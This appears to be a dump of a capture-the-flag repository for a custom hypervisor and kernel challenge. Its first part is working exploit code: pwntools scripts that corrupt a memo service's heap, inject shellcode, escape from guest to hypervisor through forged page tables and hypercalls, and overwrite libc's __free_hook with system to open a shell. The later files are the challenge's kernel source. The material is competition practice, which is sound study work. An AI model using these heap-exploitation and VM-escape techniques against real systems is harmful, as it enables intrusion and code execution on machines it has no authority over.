'hoge'], 'stderr':open('/dev/null', 'w+')}, \ 16 | remote = {'host':'localhost', 'port':16359}) 17 | env.set_item('libc', debug = None, \ 18 | local = None, \ 19 | remote = 'libc-2.27.so') 20 | env.select() 21 | 22 | libcenv = Environment('old', 'new') 23 | libcenv.set_item('arena_top', old = 0x58, new = 0x60) 24 | 25 | #========== 26 | 27 | payload_elf = open('exploit.elf').read() 28 | 29 | chdir('./release') 30 | binf = ELF(bin_file) 31 | 32 | libc = ELF(env.libc) if env.libc else binf.libc 33 | offset_libc_freehook = libc.symbols['__free_hook'] 34 | offset_libc_malloc_hook = libc.symbols['__malloc_hook'] 35 | offset_libc_mainarena = offset_libc_malloc_hook + 0x10 36 | 37 | libc_name = path.basename(path.realpath(libc.path)) 38 | libcenv.select('new' if float(libc_name[5:5+4]) >= 2.27 else 'old') 39 | offset_mainarena_top = libcenv.arena_top 40 | 41 | vm_binf = ELF(args[1]) 42 | addr_vm_memo = vm_binf.symbols['memo'] 43 | addr_vm_heap = 0x605000 44 | addr_vm_memo_buf = 0x7fff1ff000 45 | addr_vm_stack = 0x7ffffffff0 46 | 47 | #========== 48 | 49 | def attack(conn): 50 | if not env.check('debug'): 51 | if env.check('local'): 52 | conn.sendlineafter('\n', 'hoge') 53 | else: 54 | solve_pow(conn) 55 | conn.sendlineafter('> ', 'flag2.txt'+' a'*0x100) 56 | 57 | exploit_memo(conn, payload_elf, 0x150) 58 | 59 | flag1 = get_flag1(conn) 60 | success("flag1 : {}".format(flag1)) 61 | 62 | flag2 = get_flag2(conn) 63 | success("flag2 : {}".format(flag2)) 64 | 65 | get_shell(conn) 66 | 67 | def solve_pow(conn): 68 | import subprocess 69 | 70 | cmd = conn.recvuntil('\n', drop=True) 71 | info(cmd) 72 | 73 | ret = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True).communicate()[0].strip() 74 | success('hash : {}'.format(ret)) 75 | conn.sendline(ret) 76 | 77 | def get_flag1(conn): 78 | conn.recvuntil('first flag : ') 79 | return conn.recvuntil('\n') 80 | 81 | def get_flag2(conn): 82 | conn.recvuntil('ring0\n') 83 | return conn.recv(0x50).strip("\x00").split(' : ')[1] 84 | 85 | def get_shell(conn): 86 | conn.send(p64(offset_libc_mainarena)) 87 | conn.send(p64(offset_libc_freehook)) 88 | 89 | conn.send(p64(offset_mainarena_top)) 90 | 91 | addr_heap_top = u64(conn.recv(8)) 92 | info('addr_heap_top = 0x{:08x}'.format(addr_heap_top)) 93 | 94 | conn.recv(8) 95 | 96 | addr_libc_mainarena = u64(conn.recv(8)) - offset_mainarena_top 97 | libc.address = addr_libc_mainarena - offset_libc_mainarena 98 | addr_libc_system = libc.sep_function['system'] 99 | info('addr_libc_base = 0x{:08x}'.format(libc.address)) 100 | 101 | addr_vmmem = libc.address - 0x400000 102 | info('addr_vmmem = 0x{:08x}'.format(addr_vmmem)) 103 | 104 | conn.send(p64(addr_libc_system)) 105 | conn.send(p64(u(p((addr_heap_top - addr_vmmem) & ~0xfffff)) | 0x83)) 106 | conn.send(p64(((addr_heap_top - addr_vmmem) & 0xfffff) - 0x30)) 107 | conn.send('/bin/sh\x00') 108 | 109 | conn.interactive() 110 | 111 | def exploit_memo(conn, payload, ep): 112 | payload_size = 0x2000 113 | 114 | shellcode2 = shellcraft.mmap_rwx(payload_size) 115 | shellcode2 += shellcraft.read(0, 'rax', payload_size) 116 | shellcode2 += ''' 117 | add rsi, {} 118 | jmp rsi 119 | '''.format(ep) 120 | shellcode2 = asm(shellcode2) 121 | 122 | shellcode1 = 'lea rsi, [rip]' 123 | shellcode1 += shellcraft.read(0, None, len(shellcode2)+0x10) 124 | shellcode1 = asm(shellcode1) 125 | 126 | memo = Memo(conn) 127 | 128 | memo.alloc('a'*0x28) # 0 129 | memo.alloc('b') # 1 130 | memo.alloc('c'*0x8+p64(0x31)+p64(addr_vm_memo_buf+0x10-8)+p64(addr_vm_memo_buf+0x10)) # 2 131 | memo.alloc(p64(0x30)+p64(0x20)) # 3 132 | memo.alloc(shellcode1) # 4 133 | memo.alloc(p64(0xdeadbeef)+p64(0)+p64(addr_vm_stack-0x8)+p64(0)) # 5 134 | 135 | memo.edit(0, 'A'*0x28+chr(0x41)) 136 | memo.delete(1) 137 | 138 | memo.alloc('b') # 1 139 | memo.edit(2, p64(addr_vm_memo+1)[:len(p64(addr_vm_heap).rstrip('\x00'))]) 140 | sleep(0.1) 141 | memo.edit(1, p64(addr_vm_heap + 0x1100)[1:len(p64(addr_vm_memo_buf).rstrip('\x00'))]) 142 | sleep(0.1) 143 | memo.edit(2, p64(addr_vm_heap + 0x10e0)) 144 | 145 | sleep(0.1) 146 | conn.send('\x90'*0x10 + shellcode2) 147 | sleep(0.5) 148 | conn.send(payload) 149 | 150 | class Memo: 151 | def __init__(self, conn): 152 | self.recvuntil = conn.recvuntil 153 | self.recv = conn.recv 154 | self.sendline = conn.sendline 155 | self.send = conn.send 156 | self.sendlineafter = conn.sendlineafter 157 | self.sendafter = conn.sendafter 158 | 159 | def alloc(self, data): 160 | self.sendlineafter('> ', '1') 161 | self.sendafter('memo > ', data) 162 | 163 | def edit(self, idx, data): 164 | self.sendlineafter('> ', '2') 165 | self.sendlineafter('id > ', str(idx)) 166 | self.sendafter('memo > ', data) 167 | 168 | def delete(self, idx): 169 | self.sendlineafter('> ', '3') 170 | self.sendlineafter('id > ', str(idx)) 171 | 172 | #========== 173 | 174 | if __name__=='__main__': 175 | conn = communicate(env.mode, **env.target) 176 | attack(conn) 177 | 178 | #========== 179 | -------------------------------------------------------------------------------- /exploit/part/exploit_lv1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "../libc/syscall.h" 4 | 5 | #define NR_getflag 4296 6 | 7 | int main(void){ 8 | char *flag; 9 | 10 | puts("now exploiting!"); 11 | 12 | syscall(flag, NR_getflag); 13 | if((long)flag < 0){ 14 | puts("failed to get flag."); 15 | return -1; 16 | } 17 | 18 | mprotect(flag, 0x1000, PROT_READ); 19 | puts(flag); 20 | 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /exploit/part/exploit_lv2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "utils/hypercall.h" 7 | 8 | #define PDE64_PRESENT 1 9 | #define PDE64_RW (1U << 1) 10 | #define PDE64_USER (1U << 2) 11 | #define PDE64_PS (1U << 7) 12 | 13 | void syscall_handler(void); 14 | 15 | int main(void){ 16 | void *addr; 17 | uint64_t *pt; 18 | 19 | puts("now exploiting!"); 20 | 21 | addr = mmap((void*)0x80000000, 0x3000, PROT_READ|PROT_WRITE, 0, -1, 0); 22 | munmap(addr, 0x1000); 23 | mmap((void*)0xc0000000, 0x1000, PROT_READ|PROT_WRITE, 0, -1, 0); 24 | 25 | pt = addr + 0x2000; 26 | for(int i = 0; i<2; i++) 27 | pt[i] = PDE64_PRESENT | PDE64_RW | PDE64_USER | (0x1000*i); 28 | memcpy((void*)0xc0001389, &syscall_handler, 0x800); 29 | 30 | asm("syscall"); 31 | 32 | return 0; 33 | } 34 | 35 | void syscall_handler(void){ 36 | char *flag; 37 | 38 | flag = hc_load_module(2, 0, 0, 0x1000); 39 | hc_write(flag + 0x8040000000, 0x20, 0); 40 | 41 | asm("hlt"); 42 | } 43 | -------------------------------------------------------------------------------- /exploit/part/exploit_lv3.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "utils/hypercall.h" 7 | 8 | #define PDE64_PRESENT 1 9 | #define PDE64_RW (1U << 1) 10 | #define PDE64_USER (1U << 2) 11 | #define PDE64_PS (1U << 7) 12 | 13 | void syscall_handler(void); 14 | 15 | int main(void){ 16 | void *addr; 17 | uint64_t *pd, *pt; 18 | 19 | puts("now exploiting!"); 20 | 21 | addr = mmap((void*)0x80000000, 0x3000, PROT_READ|PROT_WRITE, 0, -1, 0); 22 | munmap(addr, 0x1000); 23 | mmap((void*)0xc0000000, 0x1000, PROT_READ|PROT_WRITE, 0, -1, 0); 24 | 25 | pd = addr + 0x1000; 26 | pt = addr + 0x2000; 27 | 28 | for(int i = 0; i<2; i++) // pd[0] 29 | pt[i] = PDE64_PRESENT | PDE64_RW | PDE64_USER | (0x1000*i); 30 | for(int i = 0; i<3; i++) 31 | pd[8+i] = PDE64_PRESENT | PDE64_RW | PDE64_PS | (0x400000 + 0x200000*i); 32 | 33 | memcpy((void*)0xc0001389, &syscall_handler, 0x800); 34 | 35 | asm("syscall"); 36 | 37 | return 0; 38 | } 39 | 40 | void syscall_handler(void){ 41 | void *libc = (void*)0xc1000000; 42 | void *main_arena = libc + 0x3c4b20; 43 | uint64_t *free_hook = libc + 0x3c67a8; 44 | 45 | char *heap = (void*)0xc2000000; 46 | 47 | uint64_t *pd = (uint64_t*)(0x8040000000 + 0x23000); 48 | 49 | hc_write(main_arena + 0x58, 0x18, 0); 50 | hc_read(free_hook, 0x8, 0); 51 | hc_read(&pd[16], 0x8, 0); 52 | 53 | void *p[2]; 54 | p[0] = hc_malloc(0, 0x1000); 55 | p[1] = hc_malloc(0, 0x1000); 56 | 57 | hc_free(p[0]); 58 | hc_read(heap+0x5b0, 0x8, 0); 59 | hc_free(p[1]); 60 | 61 | asm("hlt"); 62 | } 63 | -------------------------------------------------------------------------------- /exploit/part/exploit_note.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py 3 | 4 | bin_file = '../bin/memo-static.elf' 5 | context(os = 'linux', arch = 'amd64') 6 | context.log_level = 'debug' 7 | 8 | #========== 9 | 10 | env = Environment('debug', 'local', 'remote') 11 | env.set_item('mode', debug = 'DEBUG', local = 'PROC', remote = 'SOCKET') 12 | env.set_item('target', debug = {'argv':[bin_file], 'aslr':False}, \ 13 | local = {'argv':[bin_file]}, \ 14 | remote = {'host':'target.com', 'port':4296}) 15 | env.select('debug') 16 | 17 | #========== 18 | 19 | binf = ELF(bin_file) 20 | 21 | addr_heap = 0x605000 22 | 23 | addr_memo = binf.symbols['memo'] 24 | addr_memo_buf = 0x7ffff7ff9000 25 | 26 | addr_stack = 0x7fffffffda80 27 | 28 | #========== 29 | 30 | def attack(conn): 31 | memo = Memo(conn) 32 | 33 | shellcode2 = shellcraft.mmap_rwx(0x2000) 34 | shellcode2 += shellcraft.read(0, 'rax', 0x2000) 35 | shellcode2 += ''' 36 | add rsi, 0x150 37 | jmp rsi 38 | ''' 39 | shellcode2 = asm(shellcode2) 40 | 41 | shellcode1 = 'lea rsi, [rip]' 42 | shellcode1 += shellcraft.read(0, None, len(shellcode2)+0x10) 43 | shellcode1 = asm(shellcode1) 44 | 45 | memo.alloc('a'*0x28) # 0 46 | memo.alloc('b') # 1 47 | memo.alloc('c'*0x8+p64(0x31)+p64(addr_memo_buf+0x10-8)+p64(addr_memo_buf+0x10)) # 2 48 | memo.alloc(p64(0x30)+p64(0x20)) # 3 49 | memo.alloc(shellcode1) # 4 50 | memo.alloc(p64(0xdeadbeef)+p64(0)+p64(addr_stack-0x8)+p64(0)) # 5 51 | 52 | memo.edit(0, 'A'*0x28+chr(0x41)) 53 | memo.delete(1) 54 | 55 | memo.alloc('b') # 1 56 | memo.edit(2, p64(addr_memo+1)[:len(p64(addr_heap).rstrip('\x00'))]) 57 | memo.edit(1, p64(addr_heap + 0x1100)[1:len(p64(addr_memo_buf).rstrip('\x00'))]) 58 | memo.edit(2, p64(addr_heap + 0x10e0)) 59 | 60 | conn.send('\x90'*0x10 + shellcode2) 61 | conn.send(open('exploit.elf').read()) 62 | 63 | class Memo: 64 | def __init__(self, conn): 65 | self.recvuntil = conn.recvuntil 66 | self.recv = conn.recv 67 | self.sendline = conn.sendline 68 | self.send = conn.send 69 | self.sendlineafter = conn.sendlineafter 70 | self.sendafter = conn.sendafter 71 | 72 | def alloc(self, data): 73 | self.sendlineafter('> ', '1') 74 | self.sendafter('memo > ', data) 75 | 76 | def edit(self, idx, data): 77 | self.sendlineafter('> ', '2') 78 | self.sendlineafter('id > ', str(idx)) 79 | self.sendafter('memo > ', data) 80 | 81 | def delete(self, idx): 82 | self.sendlineafter('> ', '3') 83 | self.sendlineafter('id > ', str(idx)) 84 | 85 | #========== 86 | 87 | if __name__=='__main__': 88 | conn = communicate(env.mode, **env.target) 89 | attack(conn) 90 | conn.interactive() 91 | 92 | #========== 93 | -------------------------------------------------------------------------------- /exploit/release: -------------------------------------------------------------------------------- 1 | ../release -------------------------------------------------------------------------------- /exploit/start.s: -------------------------------------------------------------------------------- 1 | global _start 2 | extern main, exit 3 | 4 | _start: 5 | call main 6 | mov rdi, rax 7 | call exit 8 | hlt: 9 | hlt 10 | jmp hlt 11 | -------------------------------------------------------------------------------- /exploit/utils/Makefile: -------------------------------------------------------------------------------- 1 | AS := nasm 2 | 3 | TARGET := utils.a 4 | CSRCS := $(wildcard *.c) 5 | SSRCS := $(wildcard *.s) 6 | 7 | OBJS := $(CSRCS:.c=.o) $(SSRCS:.s=.o) 8 | DEPS := $(CSRCS:.c=.d) 9 | 10 | ifndef 11 | CFLAGS := -Wall -masm=intel -fPIE -fno-stack-protector 12 | endif 13 | 14 | .PHONY: all 15 | all: $(TARGET) 16 | 17 | -include $(DEPS) 18 | 19 | $(TARGET): $(OBJS) 20 | $(AR) rcs $@ $^ 21 | 22 | %.o: %.c 23 | $(CC) $(CFLAGS) -c -MMD -MP $< 24 | 25 | %.o: %.s 26 | $(AS) -f elf64 $^ 27 | 28 | .PHONY: clean 29 | clean: 30 | $(RM) $(DEPS) $(OBJS) $(TARGET) 31 | -------------------------------------------------------------------------------- /exploit/utils/exit.s: -------------------------------------------------------------------------------- 1 | global exit 2 | 3 | exit: 4 | mov rax, 60 5 | syscall 6 | -------------------------------------------------------------------------------- /exploit/utils/hypercall.h: -------------------------------------------------------------------------------- 1 | #ifndef _HYPERCALL_H 2 | #define _HYPERCALL_H 3 | 4 | unsigned int hc_read(void *buf, unsigned long size, int user); 5 | unsigned int hc_write(void *buf, unsigned long size, int user); 6 | 7 | void *hc_malloc(void *addr, unsigned long size); 8 | int hc_free(void *addr); 9 | 10 | void *hc_load_module(int id, void *addr, unsigned long offset, unsigned long size); 11 | 12 | #endif 13 | -------------------------------------------------------------------------------- /exploit/utils/hypercall.s: -------------------------------------------------------------------------------- 1 | global hc_read, hc_write 2 | global hc_malloc, hc_free 3 | global hc_load_module 4 | 5 | hc_read: 6 | mov rax, 0x10 7 | mov rbx, rdi 8 | mov rcx, rsi 9 | vmmcall 10 | ret 11 | 12 | hc_write: 13 | mov rax, 0x11 14 | mov rbx, rdi 15 | mov rcx, rsi 16 | vmmcall 17 | ret 18 | 19 | hc_malloc: 20 | mov rax, 0x21 21 | mov rbx, rdi 22 | mov rcx, rsi 23 | vmmcall 24 | ret 25 | 26 | hc_free: 27 | mov rax, 0x22 28 | mov rbx, rdi 29 | vmmcall 30 | ret 31 | 32 | hc_load_module: 33 | mov rax, 0x30 34 | mov rbx, rdi 35 | xchg rcx, rsi 36 | vmmcall 37 | ret 38 | -------------------------------------------------------------------------------- /exploit/utils/io.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "syscall.h" 5 | 6 | ssize_t read(int fd, void *buf, size_t count){ 7 | ssize_t n; 8 | 9 | if(!count) 10 | return 0; 11 | 12 | if (fd < 0 || buf == NULL) 13 | return -1; 14 | 15 | syscall(n, NR_read); 16 | 17 | return n; 18 | } 19 | 20 | ssize_t write(int fd, void *buf, size_t count){ 21 | ssize_t n; 22 | 23 | if(!count) 24 | return 0; 25 | 26 | if (fd < 0 || buf == NULL) 27 | return -1; 28 | 29 | syscall(n, NR_write); 30 | 31 | return n; 32 | } 33 | -------------------------------------------------------------------------------- /exploit/utils/mmap.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "syscall.h" 4 | 5 | void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset){ 6 | void *mem; 7 | 8 | syscall6(mem, NR_mmap, addr, length, prot, flags, fd, offset); 9 | 10 | return mem; 11 | } 12 | 13 | int mprotect(void *addr, size_t len, int prot){ 14 | long res; 15 | 16 | syscall(res, NR_mprotect); 17 | 18 | return res; 19 | } 20 | 21 | int munmap(void *addr, size_t length){ 22 | long res; 23 | 24 | syscall(res, NR_munmap); 25 | 26 | return res; 27 | } 28 | -------------------------------------------------------------------------------- /exploit/utils/puts.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int puts(const char *s){ 5 | int n; 6 | 7 | if((n = write(1, s, strlen(s)))) 8 | write(1, "\n", 1); 9 | 10 | return n; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /exploit/utils/string.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void *memset(void *s, int c, size_t n){ 4 | for(int i=0; i 2 | #include 3 | #include "elf/elf.h" 4 | #include "service/hypercall.h" 5 | #include "memory/memory.h" 6 | #include "memory/usermem.h" 7 | 8 | uint64_t load_elf(void){ 9 | uint64_t ehdr_phys; 10 | uint64_t ret = -1; 11 | 12 | if((ehdr_phys = (uint64_t)hc_load_module(0, 0, 0x1000)) == -1) 13 | return -1; 14 | Elf64_Ehdr *ehdr = (Elf64_Ehdr *)(ehdr_phys+STRAIGHT_BASE); 15 | 16 | if (!(ehdr->e_ident[EI_MAG0] == ELFMAG0 && ehdr->e_ident[EI_MAG1] == ELFMAG1 && \ 17 | ehdr->e_ident[EI_MAG2] == ELFMAG2 && ehdr->e_ident[EI_MAG3] == ELFMAG3 )) 18 | goto end; 19 | 20 | if (ehdr->e_ident[EI_CLASS] != ELFCLASS64) 21 | goto end; 22 | 23 | if (ehdr->e_ident[EI_DATA] != ELFDATA2LSB) 24 | goto end; 25 | 26 | for(int i = 0; i < ehdr->e_phnum; i++) { 27 | Elf64_Phdr *phdr = (Elf64_Phdr *)((uint64_t)ehdr + ehdr->e_phoff + ehdr->e_phentsize * i); 28 | uint64_t entry_phys; 29 | 30 | if(phdr->p_type != PT_LOAD) 31 | continue; 32 | 33 | if((entry_phys = (uint64_t)hc_load_module(0, phdr->p_offset, phdr->p_filesz)) == -1) 34 | goto end; 35 | 36 | uint16_t flags = phdr->p_flags; 37 | uint64_t memsz = (phdr->p_memsz + 0x1000-1) & ~0xfff; 38 | mmap_in_user(phdr->p_vaddr, entry_phys, memsz, \ 39 | (flags & PF_R ? PROT_READ : 0) | (flags & PF_W ? PROT_WRITE : 0) | (flags & PF_X ? PROT_EXEC : 0)); 40 | 41 | if(phdr->p_vaddr + memsz > brk) 42 | brk = phdr->p_vaddr + memsz; 43 | } 44 | 45 | ret = ehdr->e_entry; 46 | end: 47 | hc_free((void*)ehdr_phys, 0x1000); 48 | return ret; 49 | } 50 | -------------------------------------------------------------------------------- /kernel/elf/elf.h: -------------------------------------------------------------------------------- 1 | #ifndef _ELF_H 2 | #define _ELF_H 3 | 4 | uint64_t load_elf(void); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /kernel/kernel.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "bits.h" 3 | #include "elf/elf.h" 4 | #include "memory/sysmem.h" 5 | #include "memory/usermem.h" 6 | #include "service/switch.h" 7 | 8 | int kernel_main(void){ 9 | uint64_t entry; 10 | 11 | if((init_pagetable()) < 0) 12 | return -1; 13 | // --- new paging enabled --- 14 | if(init_gdt() < 0) 15 | return -1; 16 | 17 | asm("lea rdi, [rip + syscall_handler]\n" 18 | "call set_handler"); 19 | if(prepare_user() < 0) 20 | return -1; 21 | 22 | if((entry = load_elf()) == -1) 23 | return -1; 24 | 25 | switch_user(entry, 0x7ffffffff0); 26 | 27 | return 0; 28 | } 29 | -------------------------------------------------------------------------------- /kernel/memory/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := memory.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /kernel/memory/memory.h: -------------------------------------------------------------------------------- 1 | #ifndef _MEMORY_H 2 | #define _MEMORY_H 3 | 4 | #define STRAIGHT_BASE 0x8040000000 5 | 6 | uint64_t kernel_stack; 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /kernel/memory/sysmem.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "bits.h" 3 | #include "memory/memory.h" 4 | #include "service/hypercall.h" 5 | 6 | /* 7 | 0x8000000000 ~ 0xffffffffff : Kernel 8 | 0x8000000000 ~ 0x8000004000 : binary 1:0:0:0-3 9 | 0x8000200000 ~ 0x8000204000 : bss 1:0:1:0-3 10 | 0x8040000000 ~ 0x807ffff000 : straight 1:1:0-511:0-511 11 | 0xffffffc000 ~ 0xfffffff000 : stack 1:511:511:508-511 12 | */ 13 | 14 | int init_pagetable(void){ 15 | uint64_t mem_size; 16 | uint64_t *pml4, *pdpt, *pd, *pt; 17 | uint64_t bss_phys, cr3; 18 | 19 | mem_size = hc_mem_total(); 20 | asm volatile ("mov %0, cr3" : "=r"(cr3)); 21 | 22 | if((uint64_t)(pml4 = hc_malloc(0, 0x1000)) == -1) 23 | return -1; 24 | 25 | if((uint64_t)(pdpt = hc_malloc(0, 0x1000)) == -1) 26 | return -1; 27 | pml4[0] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pdpt; 28 | pml4[1] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pdpt; 29 | 30 | if((uint64_t)(pd = hc_malloc(0, 0x1000*3)) == -1) 31 | return -1; 32 | pdpt[0] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pd; 33 | 34 | uint16_t n_pt = (mem_size>>21) + (mem_size & ((1<<21)-1)) ? 1 : 0; 35 | if((uint64_t)(pt = hc_malloc(0, 0x1000*(2+n_pt+1))) == -1) 36 | return -1; 37 | pd[0] = PDE64_PRESENT | PDE64_GLOBAL | (uint64_t)pt; 38 | for(int i = 0; i < 4; i++) 39 | pt[i] = PDE64_PRESENT | PDE64_GLOBAL | (i<<12); 40 | 41 | pt += 512; 42 | if((bss_phys = (uint64_t)hc_malloc(0, 0x1000*4)) == -1) 43 | return -1; 44 | pd[1] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pt; 45 | for(int i = 0; i < 4; i++) 46 | pt[i] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (bss_phys+(i<<12)); 47 | 48 | pd += 512; 49 | pt += 512; 50 | 51 | pdpt[1] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pd; 52 | for(int i = 0; i < n_pt; i++, pt += 512){ 53 | pd[i] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pt; 54 | uint16_t n_page = (mem_size>>21)-i > 0 ? 512 : (mem_size & ((1<<21)-1))>>12; 55 | for(int j = 0; j < n_page; j++) 56 | pt[j] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | ((i<<21)|(j<<12)); 57 | } 58 | 59 | pd += 512; 60 | 61 | pdpt[511] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pd; 62 | pd[511] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pt; 63 | for(int i = 1; i < 5; i++) 64 | pt[512-i] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (kernel_stack-(i<<12)); 65 | 66 | asm volatile ( 67 | "mov rdx, 0x8000000000\r\n" 68 | "add rdx, [rbp+0x8]\r\n" 69 | "mov [rbp+0x8], rdx\r\n" 70 | 71 | "mov rdx, 0xfffffff000\r\n" 72 | "mov rcx, [rbp]\r\n" 73 | "and rcx, 0xfff\r\n" 74 | "or rcx, rdx\r\n" 75 | "mov [rbp], rcx\r\n" 76 | 77 | "and rbp, 0xfff\r\n" 78 | "add rbp, rdx\r\n" 79 | 80 | "mov cr3, %0\r\n" 81 | ::"r"(pml4)); 82 | 83 | return 0; 84 | } 85 | 86 | int init_gdt(void){ 87 | #define tsdp(type, s, dpl, p) (type | (s << 4) | (dpl << 5) | (p << 7)) 88 | #define saldg(slh, avl, l, db, g) (slh | (avl << 4) | (l << 5) | (db << 6) | (g << 7)) 89 | 90 | struct gdtr { 91 | uint16_t size; 92 | struct gdt *base __attribute__((packed)); 93 | } gdtr; 94 | 95 | struct gdt { 96 | uint16_t seg_lim_low; 97 | uint16_t base_low; 98 | uint8_t base_mid; 99 | uint8_t tsdp; 100 | uint8_t saldg; 101 | uint8_t base_high; 102 | } *gdtptr; 103 | 104 | if((uint64_t)(gdtptr = (struct gdt*)(hc_malloc(0, 0x1000)+STRAIGHT_BASE)) == -1) 105 | return -1; 106 | gdtr.size = sizeof(struct gdt)*6; 107 | gdtr.base = gdtptr; 108 | 109 | struct gdt gdt = { 110 | .seg_lim_low = 0xffff, 111 | .base_low = 0x0, 112 | .base_mid = 0x0, 113 | .tsdp = tsdp(11, 1, 0, 1), 114 | .saldg = saldg(15, 0, 1, 0, 1), 115 | .base_high = 0x0, 116 | }; 117 | gdtptr[2] = gdt; 118 | 119 | gdt.tsdp = tsdp(3, 1, 0, 1); 120 | gdtptr[3] = gdt; 121 | 122 | gdt.tsdp = tsdp(11, 1, 3, 1); 123 | gdtptr[4] = gdt; 124 | 125 | gdt.tsdp = tsdp(3, 1, 3, 1); 126 | gdtptr[5] = gdt; 127 | 128 | asm volatile ( 129 | "cli\r\n" 130 | "lgdt [%0]\r\n" 131 | "sti\r\n" 132 | ::"r"(&gdtr)); 133 | 134 | return 0; 135 | } 136 | -------------------------------------------------------------------------------- /kernel/memory/sysmem.h: -------------------------------------------------------------------------------- 1 | #ifndef _SYSMEM_H 2 | #define _SYSMEM_H 3 | 4 | int init_pagetable(void); 5 | int init_gdt(void); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /kernel/memory/usermem.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "bits.h" 5 | #include "memory/memory.h" 6 | #include "memory/usermem.h" 7 | #include "service/hypercall.h" 8 | 9 | /* 10 | 0x0000000000 ~ 0x7fffffffff : User 11 | 0x0000400000 ~ 0x0000403000 : binary 0:0:2:0-2 12 | 0x0000603000 ~ 0x0000604000 : bss 0:0:3:3 13 | 0x0000608000 ~ 0x0000610000 : heap 0:0:3:8-16 14 | 0x7fffffc000 ~ 0x7ffffff000 : stack 0:511:511:508-511 15 | */ 16 | 17 | int prepare_user(void){ 18 | uint64_t pml4_phys, pdpt_phys, pd_phys, pt_phys, page_phys; 19 | uint64_t *pml4, *pdpt, *pd, *pt; 20 | 21 | asm volatile ("mov %0, cr3":"=r"(pml4_phys)); 22 | pml4 = (uint64_t*)(pml4_phys+STRAIGHT_BASE); 23 | 24 | if((pdpt_phys = (uint64_t)hc_malloc(0, 0x1000)) == -1) 25 | return -1; 26 | pdpt = (uint64_t*)(pdpt_phys+STRAIGHT_BASE); 27 | pml4[0] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pdpt_phys; 28 | 29 | if((pd_phys = (uint64_t)hc_malloc(0, 0x1000)) == -1) 30 | return -1; 31 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 32 | pdpt[511] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pd_phys; 33 | 34 | if((pt_phys = (uint64_t)hc_malloc(0, 0x1000)) == -1) 35 | return -1; 36 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 37 | pd[511] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pt_phys; 38 | 39 | // stack 40 | if((page_phys = (uint64_t)hc_malloc(0, 0x1000*4)) == -1) 41 | return -1; 42 | for(int i = 0; i < 4; i++) 43 | pt[512-4+i] = PDE64_PRESENT | PDE64_RW | PDE64_USER | (page_phys+(i<<12)); 44 | 45 | return 0; 46 | } 47 | 48 | uint64_t mmap_user(uint64_t vaddr, size_t length, int prot){ 49 | uint64_t page_phys; 50 | uint16_t pages = length>>12; 51 | 52 | uint64_t ret = -1; 53 | 54 | if((page_phys = (uint64_t)hc_malloc(0, pages<<12)) == -1) 55 | return -1; 56 | if((ret = mmap_in_user(vaddr, page_phys, length, prot)) == -1) 57 | hc_free((void*)page_phys, pages<<12); 58 | 59 | return ret; 60 | } 61 | 62 | static uint64_t map_bottom; 63 | static uint64_t mappable_size(uint64_t vaddr, size_t length); 64 | static uint64_t do_mmap_in_user(uint64_t vaddr, uint64_t paddr, size_t length, int prot); 65 | 66 | uint64_t mmap_in_user(uint64_t vaddr, uint64_t paddr, size_t length, int prot){ 67 | if(vaddr&0xfff || paddr&0xfff || length&0xfff) 68 | return -1; 69 | 70 | if(!map_bottom) 71 | map_bottom = 0x7fff200000; 72 | 73 | if(vaddr){ 74 | if(mappable_size(vaddr, length) < length) 75 | return -1; 76 | } 77 | else { 78 | uint64_t ms; 79 | do { 80 | if(!(ms = mappable_size(map_bottom - length, length))) 81 | return -1; 82 | if(ms < length) 83 | map_bottom -= length - ms; 84 | } while(ms < length); 85 | 86 | vaddr = map_bottom - length; 87 | } 88 | 89 | return do_mmap_in_user(vaddr, paddr, length, prot); 90 | } 91 | 92 | static uint64_t mappable_size(uint64_t vaddr, size_t length){ 93 | uint64_t pml4_phys, pdpt_phys, pd_phys, pt_phys; 94 | uint64_t *pml4, *pdpt, *pd, *pt; 95 | 96 | uint16_t idx[] = { (vaddr>>39) & 0x1ff, (vaddr>>30) & 0x1ff, (vaddr>>21) & 0x1ff, (vaddr>>12) & 0x1ff }; 97 | uint64_t mappable = 0; 98 | 99 | asm volatile ("mov %0, cr3":"=r"(pml4_phys)); 100 | pml4 = (uint64_t*)(pml4_phys+STRAIGHT_BASE); 101 | if(!(pml4[idx[0]] & PDE64_PRESENT) 